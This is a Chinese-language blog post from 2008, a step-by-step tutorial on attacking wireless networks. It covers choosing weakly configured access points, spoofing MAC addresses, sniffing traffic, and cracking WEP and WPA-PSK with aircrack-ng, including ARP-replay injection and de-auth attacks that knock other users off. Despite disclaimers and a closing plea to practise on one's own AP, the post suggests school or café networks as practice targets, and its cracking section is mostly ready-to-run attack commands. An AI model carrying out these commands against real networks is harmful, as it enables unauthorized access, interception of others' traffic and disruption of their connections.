2008/03/24

淺談 Wireless Security (2)

開始實戰!

實戰有大致上分成四個步驟:
尋找目標
進行連線
搜集資訊
破解加密

實作的環境可以選擇在學校的無線網路或者是有開放網路的咖啡廳。當然我們必須再次強調,這只是教育技術研討用,並不鼓勵用來進行非法用途。如有發生不正當的行為,使用者必須自行承擔責任。

在尋找攻擊目標之前,必須先將手邊的工具準備齊全。例如掃瞄工具、封包擷取分析工具、更改 MAC Address、破解攻擊程式等。

工具的平台大多數為 Linux 上的工具,由此配合 Live CD 是個還不錯的方式。至於大家常用的 Windows 上也有不少工具,以下有列出的工具大家可以自行去網路上搜尋。

* 尋找目標

無線 AP 那麼多,我們要如何選擇肥羊呢?依照我們在課堂上所講過的以及人類的天性:最偷懶的設定就是最肥的肥羊!怎麼說?

首先先打開內建的無線網路工具,在外面的無線訊號中,一定會有完全沒有經過設定的基地台。例如最常見的「default」、「Wireless」等。只要連接上,就可以直接享用裡面的資源。
當然內建的工具多半不完備,在 Windows 下我推薦使用 NetStumbler。

NetStumbler 是個很不錯的免費掃瞄工具。(礙於篇幅只做簡單的介紹。)NetStumbler 可以掃瞄出 AP 的 MAC、SSID、頻道、訊號強度等資訊。可以讓攻擊者選擇易於攻擊的目標。

除了 NetStumbler 之外,大家很愛用的 Cain & Abel 在新版中也有提供簡單的 Wireless 掃瞄及攻擊。也可以配合 AirPcap Driver 及特殊的硬體做攻擊。有興趣的人可以上網購買,據說有出乎意料的效果。

在 Linux 下則是可以使用著名的 Kismet、Airodump 等工具。用法相同就請各位自行研究。

在使用工具進行掃瞄時可搭配功率較強的無線網卡,所獲得的資訊會更為齊全。在掃瞄時,由於部分 AP 有隱藏 SSID 防護掃瞄的功能(關閉 SSID Beacon 廣播),一些掃瞄工具會加入常見預設 SSID 來掃瞄,以增加成果。如果是手動掃瞄也可以自行增加 default 之類的預設 SSID。

* 進行連線

連線就不用多說了吧?點兩下!

不過在此要注意的是,您只能連線到未加密的開放式網路,或者是已知金鑰的加密網路。
在一般沒有防護且有開啟 DHCP 服務的 AP,可以直接進行連線正常使用網路。但如果未開放 DHCP 的網路,就必須要使用監聽程式或者前面所使用掃瞄工具找到的 IP 資訊來自行做設定。至於有防護鎖定 MAC Address 的網路,就必須要自行更改無線網卡的 MAC Address 為其他已成功連線的網卡。更改 MAC Address 的方法可以自行上網查詢。

* 搜集資訊

成功連上網路之後當然就是要挖寶啦!網路監聽的原理在此就不詳述。只要是任何未加密的網路封包,都會有被監聽攔截的危險。例如瀏覽網站、進行交易、BBS、MSN 聊天等。

而要進行監聽,您的網卡必須要支援開啟雜湊模式 (Promiscuous Mode),擷取不是屬於自己的封包。常用的監聽工具有 Wireshark、Cain & Abel、sniffit 等。使用方法都非常類似,所以在此也不詳述。

* 破解加密

如果連線的 AP 有進行加密怎麼辦?當然就是進行爆破啦!

一般最常見的無線網路加密有兩種:WEP、WPA。以下簡單介紹如何爆破這兩種加密方法。
WEP 是一開始無線網路很常見的加密法。但由於安全性不足,因此出現相應的破解工具。例如 WEPCrack、AirSnort、AirCrack 等。

在這邊介紹較為快速的 Linux 下的 AirCrack。
(參考頁面: http://www.wirelessdefence.org/Contents/AircrackMain.htm )

目前 AirCrack 已有新版本 AirCrack-ng http://aircrack-ng.org/
工具的名稱皆在後面加上「-ng」,並且也有提供 Windows 版本供使用。

AirCrack-ng 內含五組主要工具:
airmon-ng 網卡監聽工具
airodump-ng 封包擷取工具
aireplay-ng 封包注入工具
aircrack-ng 封包破解工具
airdecap-ng 封包解密工具

不同晶片啟動網卡的過程會略有差異,請使用者自行注意。
AirCrack 特別的是利用封包注入的方式,取得更多封包加速破解。製造大量 ARP Request 迫使 AP 進行回應,以便收集大量加密封包取得 IV 值(Initial Vector),反推回 WEP Key。


WEP Key Cracking


WEP 破解的簡單流程如下:
開啟網卡監聽 > 擷取封包 > 惡意注入封包 > 破解 WEP Key

* 啟動監聽

airmon-ng start
ex: airmon-ng start wlan0 1


先執行 airmon-ng 查看網卡的名稱,再下指令開啟監聽。如成功開啟會顯示「monitor mode enabled」。

此例為監聽第一個頻道。

* 擷取封包


airodump-ng -w -c
ex: airodump-ng -w dump -c 1 wlan0


將擷取到的封包存至檔案 dump 中。

* 注入封包


aireplay-ng [options]
ex: aireplay-ng -3 -b [AP MAC] -h [your MAC] -x [packet number] wlan0


參數 -3 強制發出大量 ARP Request 封包,讓 AP 回應加密的 ARP Reply 封包供我們收集 IV 值。
或者參數 -0 強制使用 de-auth 攻擊讓連線上 AP 的其他使用者斷線重新進行認證。

ex: aireplay-ng -0 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 wlan0


* 破解 Key


aircrack-ng -x -f 4 [filename]
ex: aircrack-ng -x -f 4 dump*.cap


將收集到的封包進行破解。參數 -x -f 會自動暴力猜測後兩個位元的 key,以便加快速度。


WPA Pre-Shared Key Cracking

WPA 雖然改進了 WEP 設計上的缺陷,改以 four-way handshake 的方式進行認證,但是其認證的過程是使用未加密的明文,可以被擷取下來進行破解。以下一樣使用 AirCrack 來簡單說明。

WPA 破解的流程如下:
開啟網卡監聽 > 擷取封包 > 惡意注入 de-authentication 封包 > 破解 WPA Key

步驟跟前面類似,以下就簡單列出示範的指令:

* 擷取封包


airodump-ng -c 9 --bssid [ssid] -w dump wlan0


[-c 9] 頻道 9
[--bssid] AP 的 SSID
[-w] 寫入檔案 dump

* 注入封包


aireplay-ng -0 1 -a [MAC] -c [MAC] wlan0


[-0 1] 注入 de-auth 封包 1 枚
[-a] AP MAC Address
[-c] 要攻擊的 client MAC Address

* 破解 WPA PSK


aircrack-ng -w password.lst -b [MAC] dump*.cap


[-w] 密碼字典檔,以字典檔攻擊加快效率。
[-b] 要攻擊的 AP MAC Address

這次簡單的攻擊就大致上講到這邊!:D
請各位「拿自己的 AP 來做練習」,以免觸法!

No comments:

Post a Comment